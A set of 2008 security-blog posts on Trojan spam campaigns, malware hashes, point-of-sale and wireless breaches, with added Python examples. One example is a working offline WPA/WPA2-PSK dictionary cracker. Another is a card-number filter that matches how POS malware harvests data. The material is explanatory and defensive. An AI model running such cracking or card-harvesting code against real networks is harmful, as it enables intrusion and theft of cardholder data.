More Trojans hiding behind false celebrity videos

July 31, 2008

Another spam campaign has surfaced that entices users to open messages carrying subject lines such as “Failure Notice”, “Your Order is Executed” or “Your Order”. The message body, however, presents something entirely different: links with titles like “Angelina Jolie Nude” or “Jennifer Lopez Extremely Naked”, each of which leads to a Trojan. In the example below the link downloads a fake AVI codec.

Here is what was hiding behind the link, as reported by VirusTotal. Note that the .text, .rdata and .data sections sit at entropy 7.96 to 8.00, which is what packed or encrypted content looks like, and that the import table includes URLOpenStreamA from urlmon.dll, a function that fetches a URL, so the binary has its own HTTP download capability once it runs.

http://www.virustotal.com/analisis/0bd3eb3d643f44c8fc3abf4e523260a2

File size: 110080 bytes
MD5: 63aaec539c2066162245dbcd401ed6dd
SHA1: 636c40e8a36b8c5148ebc155ab3507a46f9cc6b5
SHA256: 8c02faea017673b30952dbeb1f9f110cc9f7cb9a4521da5cf504c1e76c594086
SHA512: 9d7356685bc279e31d1f0cd2f51f07272b4cacb85935cab946dd1e0c7d5edbecb1cb34090bad806b88eac7b464a317991aeb4f027f912a86c5dca80319411bdc
PEiD: –
PEInfo: PE structure information

( base data )
entrypointaddress: 0x402f6e
timedatestamp: 0x48776b9b (Fri Jul 11 14:18:03 2008)
machinetype: 0x14c (I386)

( 4 sections )
name    viradd   virsiz   rawdsiz  ntrpy  md5
.text   0x1000   0x8f11   0x6200   7.99   70e00ef0c033a7a2f9f7025e9c590555
.rdata  0xa000   0x349a   0x1600   7.96   c8dcec56969c9063de3ba6e0038af237
.data   0xe000   0x25ef1  0x11200  8.00   525568375d30a9d9d560c221352b5a82
.rsrc   0x34000  0x2000   0x2000   5.31   9f54e2e8faf7d9e69eefb0e1514d836a

( 3 imports )
> gdi32.dll: ResetDCW, StretchBlt, SetICMMode, SetRelAbs, SetDIBColorTable, UpdateColors, SaveDC, TextOutW
> urlmon.dll: URLOpenStreamA, IsLoggingEnabledA, CoInstall, GetClassFileOrMime, AsyncInstallDistributionUnit, IsValidURL
> shell32.dll: StrRChrIW, SHFormatDrive, SHAppBarMessage

( 0 exports )

ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=63aaec539c2066162245dbcd401ed6dd

Angelina Jolie Spam

July 30, 2008

This morning I discovered a very interesting email in one of our spam sensors in the US. The message claims to show the viewer a nude video of Angelina Jolie; however, the link directs you to a website hosting a malicious Trojan.

http://www.virustotal.com/analisis/73bed1ec0c96beaa59fc9abb7f9ad01f

File size: 148992 bytes
MD5: a7e316a7ebc0a90f1d278d63f500e79f
SHA1: 454fa925c9c1de565e463b4763f8faee4376df94
SHA256: 1bdc9ff03f7910d24d86871d4ea9a3c1552862bfe2eaf26d2074b4098a249656
SHA512: 394d073de2bbddc427f618dc76566ceafc1df88aed296eca63a5f6e617c803272e87bea78a7a8288e17edac26ab1015719e258496a5a48df35c6bc654abf5fd8
PEiD: –
PEInfo: PE structure information

( base data )
entrypointaddress: 0x401b4e
timedatestamp: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype: 0x14c (I386)

( 3 sections )
name    viradd   virsiz   rawdsiz  ntrpy  md5
.text   0x1000   0x29000  0x1000   5.40   f234efda261d13d094fdac23c9cdbdd2
.data   0x2a000  0x23000  0x22800  7.78   284c37f82871fbc931d83b2b56ef9a00
.idata  0x4d000  0x1000   0xa00    4.61   bb5a25aa473903b9f4c49879669f77ea

( 4 imports )
> KERNEL32.dll: WritePrivateProfileStringW, GetLastError, GetSystemTime, SetEndOfFile, CallNamedPipeA, SetConsoleTitleA, VirtualProtect, WriteFileEx, Process32FirstW, ReadConsoleOutputCharacterW, SetConsoleMode, OpenJobObjectA, FlushViewOfFile
> USER32.dll: SetCursor, SetLayeredWindowAttributes, WINNLSGetIMEHotkey, FindWindowExA, InSendMessage, SetCursorPos, WaitForInputIdle, GetClipboardFormatNameA, LoadCursorFromFileW, GetThreadDesktop, SetClipboardViewer, SetDeskWallpaper, SetProgmanWindow, IsDialogMessage, EndDeferWindowPos, ShowScrollBar, WCSToMBEx, LoadAcceleratorsA, UpdateLayeredWindow, RegisterWindowMessageW, ScrollWindowEx, GetDialogBaseUnits, ModifyMenuW, CheckDlgButton, CreateWindowExW, OpenWindowStationA, ToUnicode, BlockInput, wsprintfA, GetMouseMovePointsEx, SendMessageTimeoutA, GetLastInputInfo, DlgDirSelectExW, DdeQueryStringA, ClientToScreen, IsCharAlphaNumericA
> GDI32.dll: GetKerningPairsW, ExtTextOutW, XLATEOBJ_cGetPalette, CreateBitmap, GdiCreateLocalMetaFilePict, EngComputeGlyphSet, WidenPath, GetStringBitmapA, PolyTextOutA, ScaleWindowExtEx, FlattenPath, EngDeleteSurface, SelectClipRgn, SetMapperFlags, GetCurrentPositionEx, ExtCreatePen, CreatePalette
> COMDLG32.dll: PageSetupDlgW, WantArrows, ReplaceTextW, PrintDlgW, GetSaveFileNameA, GetOpenFileNameA, ChooseColorW, LoadAlterBitmap, PrintDlgExA, ChooseFontW

FBI v.s Facebook Spam

July 29, 2008

This morning I checked one of our mailboxes here in the US and discovered this very interesting spam message carrying the subject line “F.B.I may strike facebook”. When I investigated further, the body of the message consisted of text such as “F.B.I Facebook Records” with a link to a URL that appeared to be a daily news site.

When you visit the URL, the site automatically downloads an executable named fbi_facebook.exe, tricking the user into believing the article is being loaded. The executable is not the so-called article at all, but a Trojan.

http://www.virustotal.com/analisis/727ffdbca414ed259391a55bf0be5c78

File size: 93548 bytes
MD5: fb1a39398efd85bafb22e9fc220077ce
SHA1: 784a8b27bdcc1820282094a9be8691fee79ad73c
SHA256: 08c41c3109c5a1105f04151d6288b91520f8ad7e5058f326419704ed8edb5374
SHA512: 293c8a849b7c9b86dadf7ebbbc8661535a627ba0be6bc5f2fff9525ae3793790c86d24e5391efa9330baa03b4050ff30b0171fe48998adb7d7c94d0f45c2cb94
PEiD: –
PEInfo: PE structure information

( base data )
entrypointaddress: 0x405598
timedatestamp: 0x488e95e5 (Tue Jul 29 04:00:37 2008)
machinetype: 0x14c (I386)

( 5 sections )
name    viradd   virsiz   rawdsiz  ntrpy  md5
.code   0x1000   0x4620   0x4800   7.88   227a121cd564fa93c0b3cb3b54ec349a
.rdata  0x6000   0x12f    0x200    7.61   38ed1ae64ec215e332eefb1d8a5ec253
.data   0x7000   0x820    0xa00    7.92   45dc9ac3dc99703c85bd9ff20e65b21c
.mdata  0x8000   0x10f10  0x11000  8.00   d88a0bf187575769c566908716507b7e
.CRT    0x19000  0x4      0x200    7.60   3e92819be4f67d671e12b3ae9b1f249e
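The three VirusTotal listings on this page share two tells worth checking on any sample before it goes anywhere near a debugger: most sections sit at entropy 7.6 to 8.0, which is what compressed or encrypted content looks like, and the compile timestamps range from plausible (July 2008) to the Jolie sample's 0x2a425e19, which is the constant the Delphi linker writes into every binary it produces and says nothing about when the file was built. The following stdlib-only Python script is an added example, not code from the original posts or from VirusTotal: it parses the section table of a PE file, computes per-section entropy in the same columns as the listings above (viradd, virsiz, rawdsiz, ntrpy), and decodes the timestamp with that Delphi caveat. The 7.0 entropy threshold is a rule-of-thumb assumption, and build_sample_pe() constructs a minimal test binary so the script runs offline.

```python
"""Quick static triage of a Windows PE: section entropy plus compile timestamp.
Added example, not from the original posts; stdlib only, no pefile dependency.
The fields returned mirror the VirusTotal PEInfo listing (viradd, virsiz,
rawdsiz, ntrpy) so the two can be compared directly.
"""
import math
import struct
import sys
from collections import Counter
from datetime import datetime, timezone

# Constant TimeDateStamp the Delphi linker writes into every binary it produces
DELPHI_TIMESTAMP = 0x2A425E19


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant, 8.0 when all 256 values are equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, stamp, _symtab, _nsyms, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "viradd": vaddr, "virsiz": vsize, "rawdsiz": rawsize,
            "ntrpy": round(shannon_entropy(raw), 2),
        })
    return {"machine": machine, "timestamp": stamp, "sections": sections}


def packed_sections(info: dict, threshold: float = 7.0) -> list:
    """Sections whose raw bytes look compressed or encrypted (ntrpy >= threshold, a heuristic)."""
    return [s["name"] for s in info["sections"] if s["ntrpy"] >= threshold]


def describe_timestamp(stamp: int) -> str:
    """Decode the COFF TimeDateStamp; it is attacker-controlled, and one value is so
    common it means nothing at all."""
    when = datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y")
    note = " (fixed Delphi linker value, not a build date)" if stamp == DELPHI_TIMESTAMP else ""
    return f"0x{stamp:08x} ({when}){note}"


def build_sample_pe() -> bytes:
    """Constructed PE32 for the demo: a repetitive .text and a .data holding every
    byte value equally often (entropy exactly 8.0), like the packed .data sections above."""
    text = b"\x55\x8b\xec\x83\xc4\x10\x5d\xc3" * 64          # 512 bytes, 8 distinct values
    data = bytes(range(256)) * 2                              # 512 bytes, 256 distinct values
    secs = [(b".text", 0x1000, text), (b".data", 0x2000, data)]
    opt_size = 224                                            # PE32 optional header size
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * len(secs)
    raw_ptr = (hdr_len + 0x1FF) & ~0x1FF                      # first section on a 512-byte boundary
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)      # e_lfanew at offset 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(secs), 0x48776B9B, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, remainder zeroed
    table, body = b"", b""
    for name, vaddr, raw in secs:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw),
                             raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    head = dos + coff + opt + table
    return head + b"\0" * (raw_ptr - len(head)) + body


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    info = parse_pe(blob)
    print("timedatestamp:", describe_timestamp(info["timestamp"]))
    for s in info["sections"]:
        print(f"{s['name']:<8}0x{s['viradd']:<8x}0x{s['virsiz']:<8x}0x{s['rawdsiz']:<8x}{s['ntrpy']:.2f}")
    print("packed?", packed_sections(info))
```

Run it with a file path to triage a real sample; without arguments it parses the constructed binary. Treat a high-entropy section as a prompt to look closer rather than a verdict: a .rsrc full of icons or compressed resources scores high too, and the timestamp can be set to anything by whoever built the file.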

 


Point-of-Sales Vulnerabilities

July 24, 2008

The Target: the wireless point-of-sale (POS)

The wireless POS system consists of one or more networked wireless POS end-points located at checkout stands and an internal on-site transaction server that connects the system to the payment authorization source. The transaction server also interfaces with the inventory control system.

• Transaction initiated at wireless POS checkout stand

• Transaction information sent to wireless access point, to transaction server, to authorization source

• Transaction authorization returns to POS checkout to complete transaction

Note that each of these hops is a potential point of attack.

From an architectural perspective a POS end-point runs an operating system, either a version of Windows or Linux configured to limit functionality, meaning not all OS functions are available to the logged-in user. These devices are physically divided into two components:

• Card Reader: the unit that reads the card as it is swiped.

• Transaction Unit: the unit that sends the card data to an authorization source.

The data read at the POS is sent to an authorization source (e.g., Amex) through the transaction unit. In addition, the details of the purchase (payment, item, quantity, etc.) are sent over the network to a branch server for inventory control and auditing.

Normally the link between the retailer and the authorization source uses strong encryption to protect the data; however, traffic between the POS and the internal branch servers may or may not be encrypted, depending entirely on the configuration.

Assuming the retailer does encrypt traffic between the POS and the branch server, the real vulnerabilities lie at the POS end-point, the wireless access point and the branch server itself.

• Because a POS terminal reads the card data, performs the transaction and receives the authorization code, that data may be held for short periods in flash, static RAM or on the hard drive (e.g., a few hours until the register closes). Malware installed directly on the POS could therefore intercept the transaction data as it is sent to the authorization source or to the branch server for storage.

• Branch servers collect data from multiple POS terminals, so they usually run a database of some kind. An attacker wanting that data would first have to compromise the server and then defeat whatever encryption protects the stored records.

Because the target is usually cardholder data, attackers are developing strategies that involve breaching wireless networks: a POS can only be reached through direct physical access or over the network, and a wireless network is easier to penetrate than the corporate firewall and its external gateway.

Penetrating a wireless network and planting targeted malware has only recently emerged and is expected to increase, since cardholder data is one of the primary targets among data of value.

Once the intruder has access to the wireless network, the next step is to compromise the POS or the branch server. There are a number of vectors through which this can be done in a relatively short time:

• Privilege escalation: exploiting a local vulnerability or misconfiguration to elevate a restricted account to one with the access needed to reach other parts of the system.

• Attacking exposed network services (IIS, SQL Server, Apache, etc.): gaining access by exploiting specific vulnerabilities that allow remote arbitrary code execution.

• Buffer overflow attacks: overflowing a buffer in an application can, in some cases, allow arbitrary code to execute, typically used to bind a remote shell. Done correctly against a system that is even somewhat vulnerable, these methods often work.

One popular method today is targeted malware built to extract card numbers and other sensitive data directly from the wireless POS, the access point or the branch server.

In some recent breaches malware was installed on key servers, and the avenue of attack was a wireless network at a field office.

One theory of how such malware works is that it captures details in real time through Trojans that interact directly with the application on the POS terminal, capturing the customer's data as it is sent to the authorization source or the branch server.

Once the malware has captured the data it can open a channel to a command-and-control server and upload it. The C&C server is often also connected to thousands of compromised PCs and distributes the stolen data to be stored on consumers' PCs. The chilling part is that any consumer's PC, once compromised, can instantly become a drop box for stolen corporate data.

Hiding the evidence

The attacker's next step after compromising the POS is to hide the obvious signs that the system has been tampered with; installing a rootkit is one way to hide the traces of the attack. Persistent kernel-mode rootkits are the hardest form to detect.

This greatly reduces the chance of detection by security scanners, anti-virus products or other tools that look for vulnerabilities, and lets the breach stay hidden for as long as possible before anyone considers that a POS might be compromised.


Anatomy of a Data Breach Part 3 – The Wireless Hack

July 17, 2008

Wireless networks and endpoints offer convenience and connectivity. Unless properly secured, they also offer a way into the network. This article describes the vulnerabilities and strategies for mitigating them.

In the wake of undiscovered data breaches and their subsequent public exposure, hackers have begun to turn their eye towards breaching wireless networks and taking advantage of their many inherent weaknesses. Furthermore, we are seeing a trend towards stealing cardholder data from retailers such as TJX and Hannaford Brothers as a quick way to profit.

Wireless networks are a common way of giving employees access anywhere, anytime, across the corporate campus. However, they come with several often-ignored dangers:

• Exploitation of weaknesses in the WEP and WPA protocols.

• Impersonation of access points and interception of wireless traffic.

• Access points being deployed with little or no security enabled.

All of these vulnerabilities can lead to the exposure of private data if they are not accounted for when implementing a data security policy. The weaknesses of a wireless environment can also lead to violations of PCI, HIPAA and SOX if an exposure occurs through one of them. These regulations were designed to protect specific classes of data whose exposure carries serious consequences: fines, potential jail time and a host of other unwanted after-effects.

The Target: Wireless Point-of-Sales (POS)

For example, the protection of cardholder data under PCI-DSS includes a number of requirements to aid in developing policy that (a) protects cardholder data stored on servers and (b) protects cardholder data in transit in transactions between front-end point-of-sale terminals and back-end merchant processing servers (the machines that handle and authorize transactions when a credit card is swiped at a store).

Because the target is usually cardholder data, which has a higher raw value on the black market than other data such as a social security number, hackers are developing strategies that involve breaching wireless networks, mainly because a wireless network is much easier to penetrate than the corporate firewall and its external gateway.

This is a stepping stone to harvesting data at rest as well as data in motion. The methodology follows the “low hanging fruit” principle and is part of an emerging trend towards gaining access to cardholder data.

Cracking the Wireless Network

Wireless attacks accounted for around 9% of the security incidents documented in a recent report published by the Verizon Business Risk team. This is most likely due to incorrectly configured access points or weak authentication. WPA-PSK with a weak passphrase is vulnerable to an offline dictionary attack once a single four-way handshake has been captured, since every candidate passphrase can then be tested without touching the network again; the time is spent hashing candidates, not decoding traffic. WEP, on the other hand, can be cracked in under 10 minutes using readily available tools.

For a wireless attack to succeed without a large investment of time and resources, the access point either has to run a weak protocol such as WEP or WPA-PSK with a guessable passphrase, or have no security enabled at all, which has been seen in the field numerous times.
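To show exactly why a captured handshake is enough, here is the WPA/WPA2-PSK key derivation carried through as an offline dictionary attack. This is an added example written for this page, not code from the original article or from any cracking tool: it implements the 802.11i derivation (PMK = PBKDF2-HMAC-SHA1 over passphrase and SSID, PTK = PRF-512 over the two MAC addresses and nonces, MIC over EAPOL-Key message 2 keyed by the first 16 bytes of the PTK) and tests a wordlist against a MIC. The SSID, MAC addresses, nonces and EAPOL frame are constructed values, and simulate_capture() stands in for a frame sniffed from the air.

```python
"""Offline dictionary attack against WPA/WPA2-PSK from a captured four-way
handshake. Added example, not from the original article; all handshake values
are constructed and simulate_capture() stands in for a sniffed message 2.

Everything the MIC depends on except the passphrase (SSID, both MACs, both
nonces, the EAPOL frame) travels in the clear, so each candidate passphrase
can be checked with no further contact with the network.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1 truncated to
    16 bytes for WPA2/CCMP, HMAC-MD5 for original WPA/TKIP."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_frame_mic_zeroed, digest).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_m2, captured_mic, wordlist, wpa2=True):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]   # KCK is the first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_m2, wpa2), captured_mic):
            return candidate
    return None


# --- constructed handshake (hypothetical values, not a real capture) ---------
SSID = "StoreWiFi"
AA = bytes.fromhex("00112233aabb")      # access point MAC
SPA = bytes.fromhex("66778899ccdd")     # POS terminal MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2: version/type/length, RSN descriptor, key info, key length,
# replay counter, SNonce, IV+RSC+ID (zero), MIC field zeroed, RSN IE as key data.
EAPOL_M2 = (
    b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00\x10" + b"\x00" * 8 + SNONCE
    + b"\x00" * 32 + b"\x00" * 16
    + b"\x00\x16" + bytes.fromhex("30140100000fac040100000fac040100000fac020000")
)


def simulate_capture(true_passphrase: str) -> bytes:
    """Stand-in for sniffing: the MIC the client would have put in message 2."""
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2)


if __name__ == "__main__":
    mic = simulate_capture("register99")
    wordlist = ["password", "12345678", "storewifi", "register99", "letmein"]
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, mic, wordlist))
```

The cost per guess is fixed by the 4096 PBKDF2 iterations, which is why this is a dictionary attack rather than a brute-force one: a long random passphrase is out of reach, a word from a list is not. WEP has no per-guess cost at all, its keystream reuse lets the key be recovered statistically from captured traffic, which is the gap between "under 10 minutes" and "given enough time" in the text above. Where a shared passphrase cannot be avoided, make it long and random; otherwise move the POS segment to WPA2-Enterprise (802.1X with per-user credentials).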

As data security becomes the number one problem, hackers will continue to innovate and find new ways of reaching the data they want. Penetrating a wireless network and planting targeted malware has only recently emerged and is expected to increase, since cardholder data is one of the primary targets among data of value.

Thus, one popular method today is targeted malware that intercepts transmissions and extracts card numbers and other sensitive data directly from those streams.

However, it all starts with penetrating the wireless network and gaining access to its resources; as we have seen, the weaker link in the chain (stores or regional offices in the field) is targeted first. In some recent breaches malware was installed on key servers, and the avenue of attack was a wireless network at a field office.

One theory of how this malware works is that it uses filters to pick out packets containing specific data (e.g. card numbers, social security numbers, authorization codes and PINs, all of which have value). Another is that it captures the details in real time through Trojans that interact directly with the application on the POS terminal, capturing the customer's data as it leaves the POS for the payment authorization gateway.

 

Once the malware has captured the data it can open a channel to a command-and-control server and upload it. The C&C server is often also connected to thousands of compromised PCs and distributes the stolen data to be stored on consumers' PCs. The chilling part is that any consumer's PC, once compromised, can instantly become a drop box for stolen corporate data.

As mentioned before, hackers will target wireless networks at smaller regional offices, as they did with Hannaford and TJX. This is done on the assumption that security there is weaker than at corporate HQ, which is part and parcel of their being “low hanging fruit”. That assumption is probably correct given the technical resources available to smaller locations and the variety of ways they are set up.

Discovery and Prevention

Determining whether you have been breached is difficult, as the intruders have likely covered their initial entry by hiding any traces (deleting or hiding audit logs, etc.). Your best approach is therefore a strategy for detecting and mitigating the effects of a breach, such as:

• Database monitoring: technologies exist to monitor SQL Server and Oracle databases for suspicious activity (access by unauthorized users, insertion of scripts, execution of unexpected SQL statements, etc.). Monitoring is only part of detecting a breach in progress, but if the intruders go on to access cardholder data stored in your databases in addition to extracting it in real time, database monitoring raises the odds of discovering that unauthorized access.

• Network intrusion detection: intrusion detection technologies, alongside other methods, can detect anomalous traffic and behaviour that might be associated with an attack.

• Hardening critical assets: you can minimize exposure and risk by hardening critical assets (in this case the POS terminal), removing non-essential services, applications and open ports that add complexity and introduce additional risk.
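The filtering the article attributes to the malware (picking packets that carry card numbers, authorization codes and so on) is exactly the check a defender's network intrusion detection should be running on the POS-to-branch-server segment, since the same article notes that encryption on that segment "depends on the configuration". The following Python is an added example written for this page, not code from the article or any IDS product: it scans packet payloads for ISO 7813 Track 2 data and for 13 to 19 digit runs that pass the Luhn check, masks what it finds to first six and last four digits, and reports the flow. If it ever fires on a segment that is supposed to be encrypted, the encryption is not there. The packets, addresses and field layout are constructed; the card numbers are the brands' published test numbers.

```python
"""Filter for cleartext cardholder data in POS-to-branch-server traffic.
Added example, not from the original article: the same filtering the article
describes the malware performing, used by the defender as an IDS/DLP check.
Packet payloads below are constructed; the PANs are published test numbers.
"""
import re

# ISO 7813 Track 2: ;PAN=YYMM SSS discretionary?  (start sentinel, separator, end sentinel)
TRACK2_RE = re.compile(rb";(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})[^?]*\?")
# 13-19 digit run, optionally grouped with spaces or hyphens, not embedded in a longer run
PAN_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn (mod 10) check used by every major card brand; weeds out order numbers,
    timestamps and other digit runs of the same length."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """PCI-style display form: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_card_data(payload: bytes) -> list:
    """Return a list of {kind, pan[, exp]} hits for Luhn-valid card data in one payload."""
    hits = []

    def _track2(m):
        pan = m.group("pan").decode()
        if luhn_ok(pan):
            hits.append({"kind": "track2", "pan": mask_pan(pan), "exp": m.group("exp").decode()})
        return b"<track2>"  # blank the match so the PAN is not reported a second time

    remainder = TRACK2_RE.sub(_track2, payload)
    for m in PAN_RE.finditer(remainder):
        digits = re.sub(rb"[ -]", b"", m.group(0)).decode()
        if luhn_ok(digits):
            hits.append({"kind": "pan", "pan": mask_pan(digits)})
    return hits


def scan_packets(packets) -> list:
    """packets: iterable of (src, dst, payload). One alert per packet carrying
    card data in the clear; encrypted payloads yield nothing, which is the point."""
    alerts = []
    for src, dst, payload in packets:
        hits = find_card_data(payload)
        if hits:
            alerts.append({"src": src, "dst": dst, "hits": hits})
    return alerts


# Constructed traffic on the POS -> branch server segment (hypothetical addresses and format)
SAMPLE_PACKETS = [
    ("10.20.1.15", "10.20.0.5", b"TXN|lane=03|;4111111111111111=09121011234567890?|amt=45.99"),
    ("10.20.1.16", "10.20.0.5", b"INV|sku=88123|qty=2|order=1234567890123456"),
    ("10.20.1.17", "10.20.0.5", b"AUTH|pan=3782 822463 10005|exp=1009|code=123"),
    ("10.20.1.15", "10.20.0.5", b"\x17\x03\x01\x00\x3c" + bytes(range(60))),  # TLS record: opaque
]

if __name__ == "__main__":
    for alert in scan_packets(SAMPLE_PACKETS):
        print(alert["src"], "->", alert["dst"], alert["hits"])
```

The second packet shows why the Luhn check matters: a 16-digit order number would otherwise be reported as a card. The fourth shows the limit of the technique, and also its value as an audit: once the POS link is properly encrypted the filter goes quiet, and a retailer can prove that by replaying a capture from each store through it.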


PandaLabs Q2 Figures

July 7, 2008

Today we published our Q2 figures covering the most relevant trends in the malware landscape. Some of the key points from the Q2 report include:

  • Distribution of Banker Trojan families by prevalence in the market.
  • Distribution of active malware by country (PCs with malware actively running in memory).
  • Spam levels fluctuated between 60% and 94% of all email on the Internet.

Banker Trojans remain a prominent factor in identity theft. As covered in the report, Banker Trojans saw a 400% increase compared with previous years, which were significantly lower. In addition, Russian Banker Trojans remain strong in the overall distribution by family.

In the first half of Q2 2008 we saw SQL injection attacks used to conduct mass hacking campaigns with the aim of distributing as much malware as possible. In conclusion, cyber-crime continues to evolve and should not be ignored when implementing security at your organization. The report can be found here:


Trojan to Worm Creator: A Camouflage?

July 1, 2008

Recently PandaLabs discovered a specialized tool for converting a Trojan into a worm. Tools like these are not new and have been available for some time in underground forums frequented by script kiddies and novice hackers. The danger with this particular kit is that it can turn a banker Trojan into a worm almost instantly.

Hackers produce these malware-building kits as a way to distract defenders from clever and highly sophisticated targeted attacks against commercial entities. The more malware in the wild, the better, as it creates a level of noise that the anti-virus labs have to deal with.

Essentially, the volume of new and unique malware has increased over the last year from a few hundred thousand samples to a few million.